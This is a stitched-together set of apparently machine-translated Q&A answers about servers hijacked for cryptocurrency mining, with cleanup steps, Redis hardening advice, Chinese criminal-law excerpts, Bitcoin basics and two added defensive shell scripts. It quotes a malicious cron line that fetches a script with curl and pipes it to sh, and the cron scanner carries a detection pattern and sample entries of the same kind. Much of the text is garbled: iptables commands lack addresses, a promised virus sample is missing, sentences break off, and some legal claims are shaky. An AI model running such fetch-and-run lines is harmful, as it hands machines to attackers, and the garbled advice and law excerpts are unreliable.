stealing server mining crime

Ⅰ What should I do if the Alibaba Cloud server is mined (pure computer novice)

1. Block access to the mining server

iptables -A INPUT -s xmr -j DROP and iptables -A OUTPUT -d -j DROP.

2. chmod -x minerd to remove the execute permission. Until the root cause is found, do not delete minerd, because if you delete it, it will be regenerated automatically.

3. pkill minerd, kill the process

4. service crond stop, or crontab -r to delete all scheduled tasks

5. Execute top, check for a while, and find no more minerd process.

6. Check the /var/spool/cron/ directory. A scheduled-task file for the root user is found there.

Download the script statement:

*/5 * * * * curl -fsSL http:// | sh
The content of the virus file is as follows, if you are interested, you can study it:


Removing minerd is not the ultimate goal; the main thing is to find the root cause of the problem. My server's problem lay in the Redis service. Hackers used a vulnerability in Redis to gain access to the server and inject the virus. The following is the fix and cleanup work:

1. Repair the backdoor of redis,

Configure the bind option to limit the IPs that can connect to the Redis server, and change Redis's default port, 6379.
Configure AUTH and set a password; note that the password is saved in the Redis configuration file in clear text.
Configure rename-command CONFIG "RENAME_CONFIG", so that even if there is unauthorized access, it is more difficult for attackers to use the config commands.
The good news is that the author of Redis said that they will develop “real user”, which distinguishes between ordinary users and admin permissions. Ordinary users will be prohibited from running certain commands, such as con f
2. Open ~/.ssh/authorized_keys, delete accounts you don’t know

3. Check your user list to see if any users you don’t know have been added. If there is, delete it.
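
The Redis settings listed in this answer (bind, a non-default port, an AUTH password, a renamed CONFIG command) can be checked mechanically. The script below is an added example, not code from the original post; the function names, the sample configurations and the placeholder password are assumptions made for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): audit a redis.conf read from stdin
# for the settings listed above. Prints one finding per line, nothing if all pass.

# Last active occurrence of directive $1 in $active (comments already removed).
directive() {
    printf '%s\n' "$active" | grep -Ei "^[[:space:]]*$1[[:space:]]" | tail -n 1
}

audit_redis_conf() {
    active=$(grep -Ev '^[[:space:]]*(#|$)' || true)

    bind_line=$(directive bind)
    if [ -z "$bind_line" ]; then
        echo "bind: not set, Redis listens on every interface"
    elif printf '%s\n' "$bind_line" | grep -Eq '[[:space:]](0\.0\.0\.0|\*|::)([[:space:]]|$)'; then
        echo "bind: listens on all interfaces ($bind_line)"
    fi

    port_line=$(directive port)
    if [ -z "$port_line" ] || printf '%s\n' "$port_line" | grep -Eq '[[:space:]]6379[[:space:]]*$'; then
        echo "port: still the default 6379"
    fi

    [ -n "$(directive requirepass)" ] || echo "requirepass: no AUTH password configured"

    printf '%s\n' "$active" | grep -Eiq '^[[:space:]]*rename-command[[:space:]]+CONFIG[[:space:]]' \
        || echo "rename-command: CONFIG is still callable under its own name"
    return 0
}

# Constructed sample inputs; the password is a placeholder.
weak_sample() { cat <<'EOF'
# exposed instance
bind 0.0.0.0
port 6379
EOF
}
hardened_sample() { cat <<'EOF'
bind 127.0.0.1 10.0.0.5
port 16379
requirepass CHANGE_ME_placeholder
rename-command CONFIG "RENAME_CONFIG"
EOF
}

weak_sample | audit_redis_conf       # four findings
hardened_sample | audit_redis_conf   # no output
```

To check a real instance, feed it the configuration file on stdin, for example `audit_redis_conf < /etc/redis/redis.conf` (the path depends on the installation).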

Ⅱ How long is the sentence for stealing mining in Internet cafes

Small mining in Internet cafes is sentenced to three years in prison.
Virtual currency does not have the same legal status as legal tender.
The details are as follows:
1. The quantity is difficult to meet the needs of market transactions. The Bitcoin program sets a maximum quantity limit, which is the reason why it can maintain and increase its value. It is precisely because of this that it is destined to be difficult to play the function and role of currency;
2. When the Bitcoin wallet is first installed, it will consume a lot of time to download historical transaction data blocks. During Bitcoin transactions, it takes some time to confirm the accuracy of the data, and the transaction is completed after the interaction with the network is confirmed by the entire network;
3. The price fluctuates greatly due to the intervention of a large number of speculators, so the price of Bitcoin exchanged for cash rises and falls like a roller coaster.
Article 285 of the "Criminal Law of the People's Republic of China", the crime of illegally trespassing computer information systems: whoever, in violation of state regulations, trespasses into computer information systems in the fields of state affairs, national defense construction, and cutting-edge science and technology shall be sentenced to fixed-term imprisonment of not more than three years or detention.
The crime of illegally obtaining computer information system data and illegally controlling computer information systems: whoever, in violation of state regulations, intrudes into computer information systems other than those specified in the preceding paragraph, or uses other technical means to obtain data stored, processed or transmitted in the computer information system, or illegally controls the computer information system, shall, if the circumstances are serious, be sentenced to fixed-term imprisonment of not more than three years or criminal detention, and shall also or only be fined; if the circumstances are especially serious, he shall be sentenced to fixed-term imprisonment of not less than three years but not more than seven years, and shall also be fined.
The crime of providing programs and tools for invading or illegally controlling computer information systems: whoever provides programs or tools specially used for invading or illegally controlling computer information systems, or knowingly provides programs or tools to others who commit the illegal and criminal acts of invading and illegally controlling computer information systems, shall, if the circumstances are serious, be punished in accordance with the provisions of the preceding paragraph.
If a unit commits the crimes mentioned in the preceding three paragraphs, the unit shall be fined, and the person in charge and other directly responsible personnel who are directly responsible for it shall be punished in accordance with the provisions of the respective paragraphs.
Article 286 The crime of destroying a computer information system violates state regulations, deletes, modifies, adds, or interferes with the functions of a computer information system, causing the computer information system to fail to operate normally, and the consequences are serious, and shall be sentenced to a term of not more than five years imprisonment or criminal detention; if the consequences are particularly serious, the sentence shall be fixed-term imprisonment of not less than five years.
In violation of state regulations, the operation of deleting, modifying or adding data and application programs stored, processed or transmitted in the computer information system, with serious consequences, shall be punished in accordance with the provisions of the preceding paragraph.
Deliberately making or spreading computer viruses and other destructive programs that affect the normal operation of the computer system, with serious consequences, shall be punished in accordance with the provisions of the first paragraph.
If the unit commits the crimes mentioned in the preceding three paragraphs, the unit shall be fined, and the person in charge and other persons who are directly responsible for it shall be punished in accordance with the provisions of paragraph 1.

Ⅲ 14.5 million stolen! Jiangxi "Bitcoin" theft case is solved, what punishment will the suspect face

The current era is an era of the Internet, and it is also an era of rapid development. There are many people who think about making money through illegal means, which is actually not worth advocating. We also hope that everyone can learn from this lesson; the suspect will also face very severe punishment.

We also hope that this lesson will give everyone a wake-up call. If everyone is like them, then they will definitely face prison. At the same time, we should note that no matter how powerful the hacking technology is, there will still be a lot of hot spots. After all, it is a mortal body and cannot be separated from legal sanctions. I also hope that they can learn this lesson and be a good person in the future. I must not do anything illegal, I hope everyone can notice this.

Ⅳ What should I do if the server is mined?

What did my buddy get mined for? Go report it. When the traffic ore was very popular before, my server was also hacked unscrupulously and became a broiler. Then I went to find his information, took screenshots and reported the traffic ore, and it helped me deal with it. If you see what you have been charged with, go to them to deal with it.

Ⅴ Is it illegal to be a bitcoin mining machine?

As of July 24, 2020, the state has not issued any laws stating that bitcoin mining machines are illegal.

Bitcoin mining machine is one of the ways to get bitcoin. Bitcoin (Bitcoin) is a network virtual currency generated by open source P2P software.

It is not issued by a specific currency institution, and is generated by a large number of calculations of a specific algorithm. The Bitcoin economy uses a distributed database composed of many nodes in the entire P2P network to confirm and record all transaction behaviors. The decentralized nature of P2P and the algorithm itself can ensure that the currency value cannot be artificially manipulated by mass-producing Bitcoin.

(5) Extended reading of the crime of misappropriating server mining

The issuance and transaction of Bitcoin are achieved through mining. Bitcoin is minted at a definite but ever-decreasing rate. Each new block is accompanied by a certain amount of brand new bitcoins that are created from scratch, which is rewarded as a coinbase transaction to the miner who found the block.

The reward of each block is not fixed. Each time 210,000 blocks have been mined, which takes about 4 years, the currency issuance rate is reduced by 50%. During Bitcoin's first four years of operation, 50 new bitcoins were created per block. 12.5 new bitcoins are created per block. In addition to block rewards, miners also receive fees for all transactions within the block.

Reference Source: Network – Bitcoin Mining Machine

VI Is the act of ore applicable to the crime of theft or illegal mining

I am a lawyer.
The crime of theft, in Article 264 of the Criminal Law, refers to stealing public and private property for the purpose of illegal possession, where the amount stolen is huge. The crime of illegal mining is stipulated in Article 343 of the Criminal Law; it refers to the act of violating the provisions of the Mineral Resources Protection Law by mining without obtaining a mining license, or by entering mining areas planned by the state, mining areas that are of great value to the national economy, or the mining areas of others and mining without authorization, and refusing to stop mining after being ordered to stop, causing damage to mineral resources.

VII The help server is hacked by mining programs, how to troubleshoot

A new customer recently consulted our SINE security company, saying that the server often stalls, the website cannot be opened, and the remote connection to the server is very slow; sometimes the PING value is between 300-500, and packets are often dropped. Going by what the customer said, one would generally judge that the server had received a mixed CC + DDoS traffic attack, but on asking more specifically, the customer said the computer room had not been attacked by traffic, which is a bit strange. If it is not a traffic attack, yet the server still stalls and the website fails to open, what attack is this? To solve the client's server stalling problem, we immediately arranged for a security engineer to conduct security testing and security deployment on his Linux server.

The mining Trojan is also designed to start mining again automatically if the mining process is stopped by the customer, so the mining is intermittent. A careful check found that it does this by setting an hourly scheduled task that downloads the shell mining Trojan remotely and executes it to check whether the process currently exists; if it does not exist, it starts the mining Trojan and begins mining.

The customer's Linux server underwent a detailed security inspection, which found that, fortunately, the server's data had not been encrypted and there was no infecting worm virus. If the data had been encrypted, the loss would have been great: the customer is a platform, and the customer data inside is very important. The mining Trojan was found. Finally, the client needs to know how exactly the server was attacked and how the mining Trojan was uploaded, in order to prevent such attacks from recurring in the future.

Through the security inspection and analysis of our security engineers, it was found that the server uses an Apache Tomcat environment and that the platform's development architecture is JSP + Oracle database. The Apache Tomcat in use is the 2016 version, which leaves it with a serious remote command execution vulnerability. Intruders can directly invade the server through this vulnerability and get the administrator rights of the server.

SINE security engineers immediately repaired the Apache vulnerability and removed the Trojan horse. So far, the problem has been solved, the client's server is running stably, and the website opens normally.
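
Both the root crontab entry in section Ⅰ (`curl -fsSL ... | sh` every five minutes) and the hourly task described in this section keep the miner alive by downloading a script and piping it into a shell. The scanner below is an added example, not code from the original page; the function names, sample files and `.invalid` hosts are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original page): flag cron entries that download a
# script with curl or wget and pipe it straight into a shell.

# curl/wget ... | [/path/]sh, bash, dash, zsh or ksh
DL_PIPE='(^|[^[:alnum:]_])(curl|wget)[[:space:]].*\|[[:space:]]*(/[^[:space:]]*/)?(ba|da|z|k)?sh([[:space:]]|;|$)'

# scan_cron PATH... -> prints "file:line:entry" for each active matching entry.
scan_cron() {
    for path in "$@"; do
        [ -e "$path" ] || continue
        # -r walks spool directories, -H keeps the file name for single files;
        # the second grep drops entries that are commented out.
        grep -rHnE "$DL_PIPE" "$path" 2>/dev/null \
            | grep -Ev '^[^:]*:[0-9]+:[[:space:]]*#' || true
    done
    return 0
}

# Constructed sample spool; hosts are placeholders under .invalid.
make_sample_spool() {
    cat > "$1/root" <<'EOF'
# constructed sample
*/5 * * * * curl -fsSL http://miner.example.invalid/i.sh | sh
0 3 * * * /usr/local/bin/backup.sh
EOF
    cat > "$1/www" <<'EOF'
0 * * * * wget -q -O- http://miner.example.invalid/x | /bin/bash
#*/5 * * * * curl -fsSL http://old.example.invalid/i.sh | sh
15 2 * * * curl -fsS https://status.example.invalid/ping >/dev/null
EOF
}

demo_dir=$(mktemp -d)
make_sample_spool "$demo_dir"
scan_cron "$demo_dir"      # reports root:2 and www:1 only
rm -rf "$demo_dir"
```

On a host, run it as root against /var/spool/cron, /etc/crontab and /etc/cron.d; any hit is a reason to inspect the entry before removing it, since the downloaded script usually reinstalls the task.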

Ⅷ Is it illegal to steal mines and smash them in your own home?

Stealing mines is illegal. If the number of mines is large, someone will take care of you. I sincerely hope to help you and look forward to adopting them.

